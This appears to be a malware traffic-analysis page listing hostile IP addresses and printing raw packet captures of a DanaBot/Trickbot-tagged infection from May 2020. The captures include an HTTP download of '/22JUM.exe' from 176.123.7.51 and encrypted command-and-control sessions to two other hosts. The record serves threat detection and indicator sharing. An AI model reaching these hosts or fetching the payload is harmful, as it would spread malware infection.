DanaBot TrickBot Malware PCAP File Download Traffic Analysis 185.45.193.50 193.34.166.247

Hostile IPs:

176.123.7.51

185.45.193.50

193.34.166.247

95.163.181.123

Tags:	DanaBot  Gozi  Quakbot  Trickbot

2020-05-29 21:10:54.694365 IP 10.1.10.15.49218 > 176.123.7.51.80: Flags [P.], seq 1:506, ack 1, win 16425, length 505: HTTP: GET /22JUM.exe HTTP/1.1

E..!..@…(S

.

..{.3.B.P..?q….P.@).F..GET /22JUM.exe HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Accept-Encoding: gzip, deflate

Range: bytes=202587-

Unless-Modified-Since: Sat, 30 May 2020 01:00:27 GMT

If-Range: “293800-5a6d31663c571”

Host: 176.123.7.51

Connection: Keep-Alive

2020-05-29 21:10:54.844053 IP 176.123.7.51.80 > 10.1.10.15.49218: Flags [.], ack 506, win 237, length 0

E..(<.@.-.E(.{.3

.

..P.B……AjP…u%……..

2020-05-29 21:10:54.846062 IP 176.123.7.51.80 > 10.1.10.15.49218: Flags [.], seq 1:1461, ack 506, win 237, length 1460: HTTP: HTTP/1.1 206 Partial Content

E…<.@.-.?s.{.3

.

..P.B……AjP….J..HTTP/1.1 206 Partial Content

Date: Sat, 30 May 2020 01:13:02 GMT

Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16

Last-Modified: Sat, 30 May 2020 01:00:27 GMT

ETag: “293800-5a6d31663c571”

Accept-Ranges: bytes

Content-Length: 2498725

Content-Range: bytes 202587-2701311/2701312

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/octet-stream

2020-05-29 21:10:51.631512 IP 95.163.181.123.80 > 10.1.10.15.49237: Flags [F.], seq 4233001886, ack 1745348952, win 388, length 0

E..(L$@./..}_..{

.

..P.U.N{.h..XP….-……..

2020-05-29 21:11:10.006491 IP 10.1.10.15.49219 > 185.45.193.50.443: Flags [S], seq 1886088581, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0

E..4..@…dn

.

..-.2.C..pkm……. . ……………

2020-05-29 21:11:10.105889 IP 185.45.193.50.443 > 10.1.10.15.49219: Flags [S.], seq 3218981652, ack 1886088582, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

E..4B.@.o.:..-.2

.

….C….pkm… ……………..

2020-05-29 21:11:10.106041 IP 10.1.10.15.49219 > 185.45.193.50.443: Flags [.], ack 1, win 16425, length 0

E..(..@…dy

.

..-.2.C..pkm…..P.@).W……..

2020-05-29 21:11:10.291324 IP 10.1.10.15.49219 > 185.45.193.50.443: Flags [P.], seq 1:25, ack 1, win 16425, length 24

E..@..@…d`

.

..-.2.C..pkm…..P.@)t…$…………………..

2020-05-29 21:11:10.427786 IP 185.45.193.50.443 > 10.1.10.15.49219: Flags [.], ack 25, win 256, length 0

E..(B.@.o.:..-.2

.

….C….pkm.P….h……..

2020-05-29 21:11:10.427918 IP 10.1.10.15.49219 > 185.45.193.50.443: Flags [P.], seq 25:649, ack 1, win 16425, length 624

E…..@…b.

.

..-.2.C..pkm…..P.@)$………..)v….f…w…..G….|.ND.A.U..T.!:.P……Y…]}Fr….m…i..es.).R.R.x….p.U5bV.^.1t….lX..5.+.2..J..-op…;.Dc….N….ou..EZ..M.H=…’.P2)CV:….y…..F.’H.C..W.$..?…F*,L.FT…A…….<.?….8A4[.W…M.s!..`…..+.I….BZ…IE….x}.C…%..N…k……%.GK.`…..s.-I…..l.,..4…….bR…….S…….i……NK!.,..\.?u’..’.\ …fR..9gmjRo..F.h3…..(.s…\.f.!w..dC”azz_…$..n….|v..$%.d…&……h..y…U.F………D……..I…#…L.K..#.K..

….<…#..u…K.

…M.U.z.C.     …..,:.c|V`..j.$X.&.3u..a….>axq.jv.J8…X…`….n1Q…..Xm…I.,A.E…….N…]…`)..[Y..;…y -K.qxY\5.o…..G…

……..c..

2020-05-29 21:11:10.541774 IP 185.45.193.50.443 > 10.1.10.15.49219: Flags [P.], seq 1:25, ack 649, win 254, length 24

E..@B.@.o.:..-.2

.

….C….pkp.P….k………..6…….7……

2020-05-29 21:11:10.781967 IP 10.1.10.15.49219 > 185.45.193.50.443: Flags [.], ack 25, win 16419, length 0

E..(..@…dv

.

..-.2.C..pkp….-P.@#……….

2020-05-29 21:11:10.877976 IP 185.45.193.50.443 > 10.1.10.15.49219: Flags [P.], seq 25:205, ack 649, win 254, length 180

E…B.@.o.:*.-.2

.

….C…-pkp.P…c…M(6…..gZ.A.l……TR…..O.      ………………….I…j8K2J.Bbm..&Mt..6d…m]….1……Q[……….V….W.:…o…H!_H..g…K.9.T…..,p*.8C………….>cP..eG.6.G..)\…{..T..

2020-05-29 21:11:30.241391 IP 10.1.10.15.49220 > 193.34.166.247.443: Flags [P.], seq 25:649, ack 1, win 16425, length 624

E…..@…f.

.

..”…D….6K.`..P.@)nQ…F&6………..(…..3……V.r….5.?$…..#4w…p..

-X)R..&!g.V.:.`XC.z…Q.B|….Vo…Q…B.K|;.h……E.8..9…p.-…..^;……[…k….

.k..&…….T..).4{….”…….m..}..upR….o.s.Z……l..;.!.’….I…6n..6u….:…2…2T.f…/i..e..@..D…….1..\…$…..R|……..:s.}.y..&.(.e.4………………………..s…….,….:C.;……a..^$.!…….+&.Vb…..<=…J..c..,BV..S.k%.”..P5..7′..N…..Dv..Q.4QK…..,.|g…3q….0.^…x@…..+Ea..@..s     …..G….W…m3..i..M4…….T….     ….l…]………$..XF.j.S…..%.9…o…..k..L.y.X…..Ht………..DKD…..c..G.|….B..R.X..!..*I..O*.>.

|…){.b.[.lZ.. .fE+E.

2020-05-29 21:11:30.357339 IP 193.34.166.247.443 > 10.1.10.15.49220: Flags [P.], seq 1:25, ack 649, win 6145, length 24

E..@..@.p.r..”..

.

….D.`….8.P…u……………….t…….

2020-05-29 21:11:30.609624 IP 10.1.10.15.49220 > 193.34.166.247.443: Flags [.], ack 25, win 16419, length 0

E..(..@…i.

.

..”…D….8..`..P.@#6………

2020-05-29 21:11:30.652687 IP 193.34.166.247.443 > 10.1.10.15.49220: Flags [P.], seq 1:205, ack 649, win 6145, length 204

E…..@.p.q..”..

.

….D.`….8.P…………………..t…….^..{.%g.+m.k..H.9N..Q1P|..5.;….v5j…..i..*u5……H……I…..pp`..U….”….r””…!\4f.#…-./G.’..r.;..R..5.JX.G.[..xN>CR..h…a2z……Z….h..?….$….6….”g…hW.L4….]

2020-05-29 21:11:30.652824 IP 10.1.10.15.49220 > 193.34.166.247.443: Flags [.], ack 205, win 16374, options [nop,nop,sack 1 {1:25}], length 0

E..4..@…i

.

..”…D….8..`….?……..

.`…`..

2020-05-29 21:11:30.677281 IP 10.1.10.15.49220 > 193.34.166.247.443: Flags [P.], seq 649:673, ack 205, win 16374, length 24

E..@..@…i.

.

..”…D….8..`..P.?…..4…………………..

2020-05-29 21:11:30.703528 IP 193.34.166.247.443 > 10.1.10.15.49220: Flags [P.], seq 25:205, ack 649, win 6145, length 180

E…..@.p.q..”..

.

….D.`….8.P…u…^..{.%g.+m.k..H.9N..Q1P|..5.;….v5j…..i..*u5……H……I…..pp`..U….”….r””…!\4f.#…-./G.’..r.;..R..5.JX.G.[..xN>CR..h…a2z……Z….h..?….$….6….”g…hW.L4….]

2020-05-29 21:11:30.703577 IP 10.1.10.15.49220 > 193.34.166.247.443: Flags [.], ack 205, win 16374, options [nop,nop,sack 1 {25:205}], length 0

E..4..@…i.

.

..”…D….8..`….?……..

.`…`..

2020-05-29 21:11:30.820514 IP 193.34.166.247.443 > 10.1.10.15.49220: Flags [.], ack 673, win 6145, length 0

E..(..@.p.r..”..

.

….D.`….8.P…^J……..